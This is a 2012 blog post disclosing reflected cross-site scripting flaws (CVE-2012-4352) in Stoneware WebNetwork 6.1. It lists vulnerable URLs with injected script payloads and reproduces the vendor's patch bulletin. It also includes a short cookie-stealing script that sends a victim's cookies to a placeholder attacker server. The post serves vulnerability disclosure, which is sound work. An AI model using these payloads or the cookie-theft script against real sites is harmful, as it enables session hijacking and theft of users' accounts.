Friday, October 19, 2012

Stoneware WebNetwork 6.1 Reflective XSS (CVE-2012-4352)

#Title: HELP! My cookiez beenz 8ted…
##CVE-2012-4352
###Vulnerability: Reflective XSS
####Vulnerable/Tested Software: Stoneware WebNetwork 6.1
#####Discovered 8/2012 Exploited by: Jacob Holcomb/G#42


Injected Javascript Payload:
https://$SERVER/community/blog.jsp?blogName=%3E%3Cscript%3Ealert%28%27x42%27%29%3C/script%3E&post=1


Vulnerable URL:

https://$SERVER/community/calendar.jsp?calendarType=(XSS_HERE)

Injected Javascript Payload:
https://$SERVER/community/calendar.jsp?calendarType=%3E%3Cscript%3Ealert%28%2700101010%27%29%3C/script%3E


Vulnerable URL:
https://$SERVER/community/blogSearch.jsp?blogName=(XSS_HERE)

Injected Javascript Payload:
https://$SERVER/community/blogSearch.jsp?blogName=><script>alert('G42')</script>


Vulnerable URL:
https://$SERVER/swDashboard/ajax/setAppFlag.jsp?app=CommunityFlags&flag=(XSS_HERE)&value=

Injected Javascript Payload:
https://$SERVER/swDashboard/ajax/setAppFlag.jsp?app=CommunityFlags&flag=%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E&value=


Vulnerable URL:
https://$SERVER/community/calendar.jsp?monthNumber=(XSS_HERE)

Injected Javascript Payload:
https://$SERVER/community/calendar.jsp?monthNumber=><script>alert('G42')</script>


Cookiez Nom NOm NOMz: - /*insert script into XSS injection point w/ script tags*/
var url = "http://Evil_ServerIPv4:2103/pwnd.php?"; var cookie = document.cookie; theft = url.concat(cookie); new Image().src= theft;




webNetwork Security Bulletin September 12, 2012
http://www2.lanschool.com/e/2262/-Security20Bulletin206-1-0-pdf/xf392/581253021



Stoneware Security Bulletin
September 12, 2012 


Summary

This security bulletin is provided to notify customers of security vulnerabilities within the webNetwork product. Stoneware has released webNetwork 6.1 Service Pack 1 to address these issues. The vulnerabilities could allow for unintended information disclosure and breach of user accounts. The impact of exploitation of these vulnerabilities depends on the sensitivity of the content contained within webNetwork. This vulnerability can allow for arbitrary execution of supplied JavaScript, which could be used to exploit vulnerabilities within a web browser, such as malicious code execution.


Vulnerability Information

ID
Description
Maximum Security Impact
Severity Rating
CVE-2012-4352
Users vulnerable to cross-site scripting (XSS)
Information Disclosure / Breach of user account
Important


Recommendation
Stoneware recommends that customers upgrade to webNetwork 6.1 Service Pack 1 at the earliest opportunity. 

Acknowledgements
Stoneware would like to thank Jacob Holcomb of Leland Public Schools for reporting CVE-2012-4352. 

Disclaimer
The information provided by Stoneware in this bulletin and in the Stoneware Knowledge Base is provided "as is" without warranty of any kind. Stoneware disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Stoneware, Inc. or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Stoneware, Inc. or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. 

Revisions
1.0, 2012-September-12, Bulletin published.


No comments:

Post a Comment